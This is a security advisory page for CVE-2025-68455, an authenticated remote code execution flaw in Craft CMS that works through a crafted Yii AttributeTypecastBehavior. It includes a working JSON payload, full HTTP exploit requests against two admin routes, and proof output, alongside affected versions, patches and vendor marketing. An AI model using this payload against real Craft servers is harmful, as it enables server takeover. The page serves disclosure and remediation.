CVE-2025-68455

CVE-2025-68455 is a high-severity security vulnerability in craftcms/cms (composer), affecting versions >= 5.0.0-RC1, <= 5.8.20. It is fixed in 5.8.21, 4.16.17.

Does this CVE actually affect you?

Kodem shows which CVEs are reachable and running in your applications, so you fix what's exploitable, not just what's listed.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Runtime intelligence, not another scanner.

Summary

Craft CMS vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior

Note that attackers must have administrator access to the Craft Control Panel for this to work.

Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.

Resources:

https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef

https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7

https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593

https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04

This was reported as a vulnerability in Yii framework on August 7th (https://github.com/yiisoft/yii2/security/advisories/GHSA-gcmh-9pjj-7fp4). The Yii framework team denies responsibility for this (placing the onus on application developers) and hence has not (and seemingly will not) provide a fix at the framework level. Hence, I am reporting this to Craft as I found it to affect the latest (5.6.0) version of Craft CMS.

Leveraging a legitimate but maliciously crafted Yii Behavior class, it’s possible to trigger Remote Code Execution (RCE) via Reflection when the tainted Behavior is attached to a Yii Component, and an event is also fired on the tainted Component.

Details

This vulnerability is inspired by CVE-2024-4990 but differs because a legitimate Yii Behavior class is used to abuse the magic __set() and __get() methods to trigger an arbitrary PHP callable, ultimately leading to RCE. As such, this bypasses the mitigations implemented for CVE-2024-4990 and the related CVE-2024-58136.

Using the as <behavior> syntax in JSON POST input, it’s possible to attach Behavior classes to Yii Components, which was the crux of the vulnerability identified in CVE-2024-4990. Fixes for that vulnerability and the related CVE-2024-58136 ensured that only classes of type Behavior could be attached to a Component. Craft CMS also implemented additional logic to prevent arbitrary Behavior classes from being attached to the vulnerable Component.

A new vulnerability has been identified that bypasses the fixes for the previous vulnerabilities by using a legitimate but specially crafted Behavior class, namely the yii\behaviors\AttributeTypecastBehavior. Attaching a Behavior of this type allows the attacker to define an arbitrary callable that is triggered if any event is fired on the tainted Component.

Using a wildcard event listener (specified as on * in JSON input) allows the attacker to catch any event called on the tainted Component and redirect the flow of control to call self::beforeSave of the AttributeTypecastBehavior, triggering the attacker-defined callable and resulting in RCE.

See the commented payload below:

{
  "as xxx": {
    "__class": "yii\\behaviors\\AttributeTypecastBehavior",
    "__construct()": [
      {
        "attributeTypes": {
          "typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"] // Attacker defined callable
        },
        "typecastBeforeSave": "touch /tmp/touch" // Argument for the callable
      }
    ]
  },
  "on *": "self::beforeSave" // When any event is fired on the Component, call beforeSave() of the AttributeTypecastBehavior to trigger the attacker-defined callable with the argument above
}

This was found to affect two separate controllers/routes in Craft CMS admin functionality, though others may be affected:

  • /index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings
  • /index.php?p=admin%2Factions%2Ffields%2Frender-card-preview

PoC

  • Install Craft CMS via Composer:
$ composer create-project "craftcms/craft" app
  • Use the built-in server to launch Craft CMS:
$ ./craft serve 127.0.0.1:9090
  • The following HTTP traces show the payload used to trigger the vulnerability on each of the vulnerable routes:

/index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings

POST /index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings&v=1763562868146 HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:9090/admin/settings/categories/new
Content-Type: application/json
X-Requested-With: XMLHttpRequest
X-Registered-Asset-Bundles: 815d39ea,22e517a2,aee7f8dc,26c46c25,e505ffd6,6b4d7555,bb2f10a0,e5e48399,fc0bc163,1ccab40d,1e21896b,54698ee0,b842675b,1c3c9add,4b1fd285,d8d08e47,8f00ce04,8768f48b,cf3018d6,ec6d0256,eccadbb
X-Registered-Js-Files: 
X-CSRF-Token: NElpp0FZTEyq2Yi4lyNbtvf5Qbtd3QIi8AUd4cJQjVKBFZrT8xSXNSuQHr269qyDYJm1hnoc98dlKRN1zAqj5r8hETtg8v1-rwd8YI-lJZxz_poluu6hCs2P6CRNu8yltOgF6vPsxT09sIund8NSBu4aocboYd0msvEcOWcT7sDsEWppVKyGSdPFMowzbbMBtBEwWz8F1AkjfAPB9NiL5HBs15C3LosCpHoXqEtehagy_Tfeff6QtVn8V1egfIjYz5jhAq6Btkklw6ZQESZG_z3F19sRKQwFxpgbzTZFULvHRKRDzP4XjYzHOKm5iR163amWgYw22pGIpA5f3_3LBIsoNqFxjJbbEo4R05ZSVldMl7jZSSQqMMbkObaaWuhwK_5q1m0B
Content-Length: 1787
Origin: http://127.0.0.1:9090
Connection: keep-alive
Cookie: CraftSessionId=b8veo0jao7aso9f9sas5irahcc; CRAFT_CSRF_TOKEN=f0a58b5c53676765154b56f4434bf49b7adac3eee76250658acfbb63999e3103a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22ovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C0b5b94bb740394a585337f1d087e4eeb1904ba802d27bf2d6a97fe35d30bda3bovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C1%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_identity=2c5abb45e65baee8d4fef5a873df2367ab1c42598a8937138bcba58593033d68a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_identity%22%3Bi%3A1%3Bs%3A162%3A%22%5B1%2C%22%5B%5C%22CdWbsSlpUey1DCRudhcod_xy0tXLc2oIHlOAeYLTAqOmF0rBIv2zaXQp4eg4AUBRc0qQr5G5wElj01yRXhojzuRZnPIW-GJqGo_U%5C%22%2Cnull%2C%5C%22961fe1815772f9207245de1a33ecd079%5C%22%5D%22%2C1209600%5D%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_username=28fa03238cbef8d3f349cde0ed37d8c62118163d18695ccdb5feec2a05906303a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar=expanded; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar-details=expanded
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0

{"uid":"c295eb34-dd4c-42ac-8d07-1b8c872a126d","layoutConfig":{"uid":"08ef66f3-f69e-495b-882f-56834efab200","tabs":[{"name":"Content","uid":"6f1efe1c-2de5-4783-ab39-7ff9149a9c90","userCondition":null,"elementCondition":null,"elements":[{"type":"craft\\fieldlayoutelements\\TitleField","inputType":null,"autocomplete":false,"class":null,"size":null,"name":null,"autocorrect":true,"autocapitalize":true,"disabled":false,"readonly":false,"title":null,"placeholder":null,"step":null,"min":null,"max":null,"requirable":false,"id":null,"containerAttributes":[],"inputContainerAttributes":[],"labelAttributes":[],"orientation":null,"label":null,"instructions":null,"tip":null,"warning":null,"providesThumbs":false,"includeInCards":false,"width":100,"dateAdded":"2025-11-19T06:33:18-08:00","uid":"bae4dcd7-635b-41fe-96a3-4d3d69e91969","userCondition":null,"elementCondition":null},{"type":"craft\\fieldlayoutelements\\CustomField","handle":null,"label":null,"instructions":null,"tip":null,"warning":null,"required":false,"providesThumbs":false,"includeInCards":false,"width":100,"dateAdded":null,"uid":"c295eb34-dd4c-42ac-8d07-1b8c872a126d","userCondition":null,"elementCondition":null,"fieldUid":"12ac060b-8c40-48a6-b70f-94361245b149","editCondition":null}]}],"generatedFields":[],"cardView":[],"cardThumbAlignment":"end","type":"craft\\elements\\Category"},"elementType":"craft\\elements\\Category","config":{
  "as xxx": {
    "__class": "yii\\behaviors\\AttributeTypecastBehavior",
    "__construct()": [
      {
        "attributeTypes": {
          "typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"]
        },
        "typecastBeforeSave": "touch /tmp/touch111"
      }
    ]
  },
  "on *": "self::beforeSave"
},"settingsNamespace":null,"settings":null}

/index.php?p=admin%2Factions%2Ffields%2Frender-card-preview

POST /index.php?p=admin%2Factions%2Ffields%2Frender-card-preview&v=1763562868148 HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:9090/admin/settings/categories/new
Content-Type: application/json
X-Requested-With: XMLHttpRequest
X-Registered-Asset-Bundles: 815d39ea,22e517a2,aee7f8dc,26c46c25,e505ffd6,6b4d7555,bb2f10a0,e5e48399,fc0bc163,1ccab40d,1e21896b,54698ee0,b842675b,1c3c9add,4b1fd285,d8d08e47,8f00ce04,8768f48b,cf3018d6,ec6d0256,eccadbb
X-Registered-Js-Files: 
X-CSRF-Token: NElpp0FZTEyq2Yi4lyNbtvf5Qbtd3QIi8AUd4cJQjVKBFZrT8xSXNSuQHr269qyDYJm1hnoc98dlKRN1zAqj5r8hETtg8v1-rwd8YI-lJZxz_poluu6hCs2P6CRNu8yltOgF6vPsxT09sIund8NSBu4aocboYd0msvEcOWcT7sDsEWppVKyGSdPFMowzbbMBtBEwWz8F1AkjfAPB9NiL5HBs15C3LosCpHoXqEtehagy_Tfeff6QtVn8V1egfIjYz5jhAq6Btkklw6ZQESZG_z3F19sRKQwFxpgbzTZFULvHRKRDzP4XjYzHOKm5iR163amWgYw22pGIpA5f3_3LBIsoNqFxjJbbEo4R05ZSVldMl7jZSSQqMMbkObaaWuhwK_5q1m0B
Content-Length: 424
Origin: http://127.0.0.1:9090
Connection: keep-alive
Cookie: CraftSessionId=b8veo0jao7aso9f9sas5irahcc; CRAFT_CSRF_TOKEN=f0a58b5c53676765154b56f4434bf49b7adac3eee76250658acfbb63999e3103a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22ovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C0b5b94bb740394a585337f1d087e4eeb1904ba802d27bf2d6a97fe35d30bda3bovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C1%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_identity=2c5abb45e65baee8d4fef5a873df2367ab1c42598a8937138bcba58593033d68a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_identity%22%3Bi%3A1%3Bs%3A162%3A%22%5B1%2C%22%5B%5C%22CdWbsSlpUey1DCRudhcod_xy0tXLc2oIHlOAeYLTAqOmF0rBIv2zaXQp4eg4AUBRc0qQr5G5wElj01yRXhojzuRZnPIW-GJqGo_U%5C%22%2Cnull%2C%5C%22961fe1815772f9207245de1a33ecd079%5C%22%5D%22%2C1209600%5D%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_username=28fa03238cbef8d3f349cde0ed37d8c62118163d18695ccdb5feec2a05906303a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar=expanded; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar-details=expanded
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0

{"fieldLayoutConfig":{
  "as xxx": {
    "__class": "yii\\behaviors\\AttributeTypecastBehavior",
    "__construct()": [
      {
        "attributeTypes": {
          "typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"]
        },
        "typecastBeforeSave": "touch /tmp/touch222"
      }
    ]
  },
  "on *": "self::beforeSave"
},"cardElements":[],"showThumb":null,"thumbAlignment":"end"}
  • Check the filesystem to confirm the creation of the two files in /tmp and hence confirm RCE:
$ ls -la /tmp/
...
-rw-rw-r--  1 calum calum       0 Nov 19 16:05 touch111
-rw-rw-r--  1 calum calum       0 Nov 19 16:05 touch222

Impact

An attacker with access to Craft CMS admin functionality, specifically the routes listed above, can trigger RCE on the backend server and potentially gain control of the server.

Affected versions

craftcms/cms (>= 5.0.0-RC1, <= 5.8.20) craftcms/cms (>= 4.0.0-RC1, <= 4.16.16)

Security releases

craftcms/cms → 5.8.21 (composer) craftcms/cms → 4.16.17 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Already deployed Kodem?

See it in your environmentNew to Kodem? Get a demo →

Remediation advice

Upgrade the following packages to resolve this vulnerability:

craftcms/cms to 5.8.21 or later; craftcms/cms to 4.16.17 or later

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2025-68455? CVE-2025-68455 is a high-severity security vulnerability in craftcms/cms (composer), affecting versions >= 5.0.0-RC1, <= 5.8.20. It is fixed in 5.8.21, 4.16.17.
  2. Which versions of craftcms/cms are affected by CVE-2025-68455? craftcms/cms (composer) versions >= 5.0.0-RC1, <= 5.8.20 is affected.
  3. Is there a fix for CVE-2025-68455? Yes. CVE-2025-68455 is fixed in 5.8.21, 4.16.17. Upgrade to this version or later.
  4. Is CVE-2025-68455 exploitable, and should I be worried? Whether CVE-2025-68455 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2025-68455 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2025-68455?
    • Upgrade craftcms/cms to 5.8.21 or later
    • Upgrade craftcms/cms to 4.16.17 or later

Other vulnerabilities in craftcms/cms

Stop the waste.
Protect your environment with Kodem.